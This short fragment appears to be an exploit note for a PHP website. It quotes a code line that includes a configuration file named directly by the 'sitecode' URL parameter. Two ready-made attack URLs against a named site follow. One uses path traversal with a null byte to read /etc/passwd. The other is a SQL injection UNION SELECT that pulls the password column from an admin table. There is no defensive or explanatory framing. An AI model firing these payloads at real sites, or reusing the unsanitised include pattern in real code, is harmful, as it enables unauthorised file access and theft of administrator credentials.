if (isset($_GET["sitecode"])) { include ("conf/global.conf"); $_SESSION["sitecode"]=$_GET["sitecode"]; $_SESSION['sitefolder']='site'; include ("conf/".strtolower($_GET["sitecode"]).".conf");
http://site.ru/index.php?sitecode=../../../../../../../etc/passwd%00
http://site.ru/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--